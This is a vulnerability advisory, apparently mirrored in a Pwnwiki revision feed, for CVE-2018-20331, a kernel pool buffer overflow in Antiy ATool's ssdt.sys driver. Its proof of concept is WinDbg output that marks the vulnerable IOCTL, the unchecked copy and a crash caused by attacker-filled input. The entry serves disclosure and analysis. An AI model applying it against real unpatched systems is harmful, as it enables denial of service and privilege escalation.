https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2018-20331_ATool_1.0.0.22%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E
CVE-2018-20331 ATool 1.0.0.22緩衝區溢出漏洞 - Revision history
2026-04-14T18:49:10Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2018-20331_ATool_1.0.0.22%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=686&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Kernel Pool Buffer Overflow ATool - 1.0.0.22 (0day) # CVE: CVE-2018-20331 # Date: 21-12-2018 # Software Link: http://www.antiy.net/ <http://www...."
2021-03-27T02:52:36Z
<p>Created page with "==EXP== <pre> # Exploit Title: Kernel Pool Buffer Overflow ATool - 1.0.0.22 (0day) # CVE: CVE-2018-20331 # Date: 21-12-2018 # Software Link: http://www.antiy.net/ <http://www...."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: Kernel Pool Buffer Overflow ATool - 1.0.0.22 (0day)<br />
# CVE: CVE-2018-20331<br />
# Date: 21-12-2018<br />
# Software Link: http://www.antiy.net/ <http://www.antiy.net/> <br />
# Exploit Author: Aloyce J. Makalanga<br />
# Contact: https://twitter.com/aloycemjr <https://twitter.com/aloycemjr><br />
# Vendor Homepage: http://www.antiy.net/ <http://www.antiy.net/> <br />
# Category: Windows<br />
# Attack Type: local<br />
# Impact:Code execution/Denial of Service/Escalation of Privileges<br />
<br />
<br />
1. Description<br />
<br />
> Local attackers can trigger a Kernel Pool Buffer Overflow in<br />
> Antiy AVL ATool<br />
> v1.0.0.22. An attacker must first obtain the ability to execute<br />
> low-privileged code on the target system in order to exploit this<br />
> vulnerability. The specific flaw exists within the processing of IOCTL<br />
> 0x80002004 by the ssdt.sys kernel driver. The bug is<br />
> caused by failure to properly validate the length of the user-supplied<br />
> data. An attacker can<br />
> leverage this vulnerability to execute arbitrary code in the context<br />
> of the kernel, which could lead to privilege escalation. A failed<br />
> exploit could lead to denial of service.<br />
<br />
<br />
<br />
2. Proof of Concept<br />
<br />
<br />
0: kd> !drvobj ssdt 2<br />
Driver object (87fe0f38) is for:<br />
\Driver\ssdt<br />
DriverEntry: aaa0b99e ssdt<br />
DriverStartIo: 00000000 <br />
DriverUnload: aaa0b828 ssdt<br />
AddDevice: 00000000 <br />
<br />
Dispatch routines:<br />
[00] IRP_MJ_CREATE aaa0b686 ssdt+0x686<br />
[01] IRP_MJ_CREATE_NAMED_PIPE 82b08da3 nt!IopInvalidDeviceRequest<br />
[02] IRP_MJ_CLOSE aaa0b686 ssdt+0x686<br />
[03] IRP_MJ_READ 82b08da3 nt!IopInvalidDeviceRequest<br />
[04] IRP_MJ_WRITE 82b08da3 nt!IopInvalidDeviceRequest<br />
[05] IRP_MJ_QUERY_INFORMATION 82b08da3 nt!IopInvalidDeviceRequest<br />
[06] IRP_MJ_SET_INFORMATION 82b08da3 nt!IopInvalidDeviceRequest<br />
[07] IRP_MJ_QUERY_EA 82b08da3 nt!IopInvalidDeviceRequest<br />
[08] IRP_MJ_SET_EA 82b08da3 nt!IopInvalidDeviceRequest<br />
[09] IRP_MJ_FLUSH_BUFFERS 82b08da3 nt!IopInvalidDeviceRequest<br />
[0a] IRP_MJ_QUERY_VOLUME_INFORMATION 82b08da3 nt!IopInvalidDeviceRequest<br />
[0b] IRP_MJ_SET_VOLUME_INFORMATION 82b08da3 nt!IopInvalidDeviceRequest<br />
[0c] IRP_MJ_DIRECTORY_CONTROL 82b08da3 nt!IopInvalidDeviceRequest<br />
[0d] IRP_MJ_FILE_SYSTEM_CONTROL 82b08da3 nt!IopInvalidDeviceRequest<br />
[0e] IRP_MJ_DEVICE_CONTROL aaa0b6c8 ssdt+0x6c8 <======================= Dispatch Function<br />
[0f] IRP_MJ_INTERNAL_DEVICE_CONTROL 82b08da3 nt!IopInvalidDeviceRequest<br />
[10] IRP_MJ_SHUTDOWN 82b08da3 nt!IopInvalidDeviceRequest<br />
[11] IRP_MJ_LOCK_CONTROL 82b08da3 nt!IopInvalidDeviceRequest<br />
[12] IRP_MJ_CLEANUP 82b08da3 nt!IopInvalidDeviceRequest<br />
[13] IRP_MJ_CREATE_MAILSLOT 82b08da3 nt!IopInvalidDeviceRequest<br />
[14] IRP_MJ_QUERY_SECURITY 82b08da3 nt!IopInvalidDeviceRequest<br />
[15] IRP_MJ_SET_SECURITY 82b08da3 nt!IopInvalidDeviceRequest<br />
[16] IRP_MJ_POWER 82b08da3 nt!IopInvalidDeviceRequest<br />
[17] IRP_MJ_SYSTEM_CONTROL 82b08da3 nt!IopInvalidDeviceRequest<br />
[18] IRP_MJ_DEVICE_CHANGE 82b08da3 nt!IopInvalidDeviceRequest<br />
[19] IRP_MJ_QUERY_QUOTA 82b08da3 nt!IopInvalidDeviceRequest<br />
[1a] IRP_MJ_SET_QUOTA 82b08da3 nt!IopInvalidDeviceRequest<br />
[1b] IRP_MJ_PNP 82b08da3 nt!IopInvalidDeviceRequest<br />
<br />
0: kd> bp aaa0b6c8<br />
0: kd> g<br />
Breakpoint 0 hit<br />
ssdt+0x6c8:<br />
aaa0b6c8 8bff mov edi,edi<br />
0: kd> dd edi<br />
87d6d238 00800005 86c620c8 00000000 00000000<br />
87d6d248 00000000 00000000 00000000 00000000<br />
87d6d258 00000000 00000000 00000000 00040002<br />
87d6d268 00000000 00000000 00000000 00000000<br />
87d6d278 00000000 00000001 00000000 00040001<br />
87d6d288 00000000 87d6d28c 87d6d28c 00040000<br />
87d6d298 00000000 87d6d29c 87d6d29c 00000000<br />
87d6d2a8 00000000 87d6d2ac 87d6d2ac 00000000<br />
0: kd> u eip L20<br />
ssdt+0x6c8:<br />
aaa0b6c8 8bff mov edi,edi<br />
aaa0b6ca 55 push ebp<br />
aaa0b6cb 8bec mov ebp,esp<br />
aaa0b6cd 83ec0c sub esp,0Ch<br />
aaa0b6d0 53 push ebx<br />
aaa0b6d1 8b5d0c mov ebx,dword ptr [ebp+0Ch]<br />
aaa0b6d4 8b4360 mov eax,dword ptr [ebx+60h]<br />
aaa0b6d7 56 push esi<br />
aaa0b6d8 33f6 xor esi,esi<br />
aaa0b6da 89731c mov dword ptr [ebx+1Ch],esi<br />
aaa0b6dd 8b5004 mov edx,dword ptr [eax+4]<br />
aaa0b6e0 8b4808 mov ecx,dword ptr [eax+8]<br />
aaa0b6e3 8b400c mov eax,dword ptr [eax+0Ch]<br />
aaa0b6e6 3d00200080 cmp eax,80002000h<br />
aaa0b6eb 57 push edi<br />
aaa0b6ec 8b7b0c mov edi,dword ptr [ebx+0Ch]<br />
aaa0b6ef 8955fc mov dword ptr [ebp-4],edx<br />
aaa0b6f2 0f84d7000000 je ssdt+0x7cf (aaa0b7cf)<br />
aaa0b6f8 3d04200080 cmp eax,80002004h <======================== Vulnerable IOCTL<br />
aaa0b6fd 7442 je ssdt+0x741 (aaa0b741)<br />
aaa0b6ff 3d08200080 cmp eax,80002008h<br />
aaa0b704 7531 jne ssdt+0x737 (aaa0b737)<br />
aaa0b706 8b37 mov esi,dword ptr [edi]<br />
aaa0b708 56 push esi<br />
aaa0b709 68a4b6a0aa push offset ssdt+0x6a4 (aaa0b6a4)<br />
aaa0b70e e873fdffff call ssdt+0x486 (aaa0b486)<br />
aaa0b713 a10cb5a0aa mov eax,dword ptr [ssdt+0x50c (aaa0b50c)]<br />
aaa0b718 3b7008 cmp esi,dword ptr [eax+8]<br />
aaa0b71b 59 pop ecx<br />
aaa0b71c 59 pop ecx<br />
aaa0b71d 7714 ja ssdt+0x733 (aaa0b733)<br />
aaa0b71f 8b00 mov eax,dword ptr [eax]<br />
0: kd> u . L40<br />
ssdt+0x6f8:<br />
aaa0b6f8 3d04200080 cmp eax,80002004h<br />
aaa0b6fd 7442 je ssdt+0x741 (aaa0b741)<br />
aaa0b6ff 3d08200080 cmp eax,80002008h<br />
aaa0b704 7531 jne ssdt+0x737 (aaa0b737)<br />
aaa0b706 8b37 mov esi,dword ptr [edi]<br />
aaa0b708 56 push esi<br />
aaa0b709 68a4b6a0aa push offset ssdt+0x6a4 (aaa0b6a4)<br />
aaa0b70e e873fdffff call ssdt+0x486 (aaa0b486)<br />
aaa0b713 a10cb5a0aa mov eax,dword ptr [ssdt+0x50c (aaa0b50c)]<br />
aaa0b718 3b7008 cmp esi,dword ptr [eax+8]<br />
aaa0b71b 59 pop ecx<br />
aaa0b71c 59 pop ecx<br />
aaa0b71d 7714 ja ssdt+0x733 (aaa0b733)<br />
aaa0b71f 8b00 mov eax,dword ptr [eax]<br />
aaa0b721 8b04b0 mov eax,dword ptr [eax+esi*4]<br />
aaa0b724 8907 mov dword ptr [edi],eax<br />
aaa0b726 8b45fc mov eax,dword ptr [ebp-4]<br />
aaa0b729 89431c mov dword ptr [ebx+1Ch],eax<br />
aaa0b72c 33f6 xor esi,esi<br />
aaa0b72e e9ad000000 jmp ssdt+0x7e0 (aaa0b7e0)<br />
aaa0b733 83631c00 and dword ptr [ebx+1Ch],0<br />
aaa0b737 be0d0000c0 mov esi,0C000000Dh<br />
aaa0b73c e99f000000 jmp ssdt+0x7e0 (aaa0b7e0)<br />
aaa0b741 6844646b20 push 206B6444h <======================= Pooltag<br />
aaa0b746 c1e902 shr ecx,2<br />
aaa0b749 52 push edx<br />
aaa0b74a 8bf1 mov esi,ecx<br />
aaa0b74c 6a00 push 0 <==================================Pool type<br />
aaa0b74e <br />
<br />
1: kd> u . L20<br />
ssdt+0x782:<br />
aaa0b782 8911 mov dword ptr [ecx],edx<br />
aaa0b784 83c104 add ecx,4<br />
aaa0b787 ff4df8 dec dword ptr [ebp-8]<br />
aaa0b78a 75e5 jne ssdt+0x771 (aaa0b771)<br />
aaa0b78c 8b75f4 mov esi,dword ptr [ebp-0Ch]<br />
aaa0b78f 8b0d0cb5a0aa mov ecx,dword ptr [ssdt+0x50c (aaa0b50c)]<br />
aaa0b795 3b7108 cmp esi,dword ptr [ecx+8]<br />
aaa0b798 7316 jae ssdt+0x7b0 (aaa0b7b0)<br />
aaa0b79a 8bd6 mov edx,esi<br />
aaa0b79c 8b09 mov ecx,dword ptr [ecx]<br />
aaa0b79e 8b0c91 mov ecx,dword ptr [ecx+edx*4]<br />
aaa0b7a1 890c90 mov dword ptr [eax+edx*4],ecx<br />
aaa0b7a4 8b0d0cb5a0aa mov ecx,dword ptr [ssdt+0x50c (aaa0b50c)]<br />
aaa0b7aa 42 inc edx<br />
aaa0b7ab 3b5108 cmp edx,dword ptr [ecx+8]<br />
aaa0b7ae 72ec jb ssdt+0x79c (aaa0b79c)<br />
aaa0b7b0 8b4dfc mov ecx,dword ptr [ebp-4]<br />
aaa0b7b3 8bd1 mov edx,ecx<br />
aaa0b7b5 c1e902 shr ecx,2<br />
aaa0b7b8 8bf0 mov esi,eax<br />
aaa0b7ba f3a5 rep movs dword ptr es:[edi],dword ptr [esi]<br />
aaa0b7bc 8bca mov ecx,edx<br />
aaa0b7be 83e103 and ecx,3<br />
aaa0b7c1 50 push eax<br />
aaa0b7c2 f3a4 rep movs byte ptr es:[edi],byte ptr [esi] <======================= Vulnerable copy<br />
<br />
1: kd> dc edi<br />
85a6ce00 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA <================ Evil user input <br />
85a6ce10 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA<br />
85a6ce20 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA<br />
85a6ce30 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA<br />
85a6ce40 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA<br />
85a6ce50 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA<br />
85a6ce60 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA<br />
85a6ce70 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA<br />
1: kd> g<br />
<br />
*** Fatal System Error: 0x00000019<br />
(0x00000020,0x892CF250,0x892CF260,0x08020012)<br />
<br />
Break instruction exception - code 80000003 (first chance)<br />
<br />
A fatal system error has occurred.<br />
Debugger entered on first try; Bugcheck callbacks have not been invoked.<br />
<br />
A fatal system error has occurred.<br />
<br />
1: kd> !analyze -v<br />
<br />
*******************************************************************************<br />
* *<br />
* Bugcheck Analysis *<br />
* *<br />
*******************************************************************************<br />
<br />
<br />
BAD_POOL_HEADER (19)<br />
The pool is already corrupt at the time of the current request.<br />
This may or may not be due to the caller.<br />
The internal pool links must be walked to figure out a possible cause of<br />
the problem, and then special pool applied to the suspect tags or the driver<br />
verifier to a suspect driver.<br />
Arguments:<br />
Arg1: 00000020, a pool block header size is corrupt.<br />
Arg2: 892cf250, The pool entry we were looking for within the page.<br />
Arg3: 892cf260, The next pool entry.<br />
Arg4: 08020012, (reserved<br />
<br />
<br />
<br />
<br />
<br />
<br />
3. Solution:<br />
<br />
None<br />
<br />
<br />
</pre></div>
Pwnwiki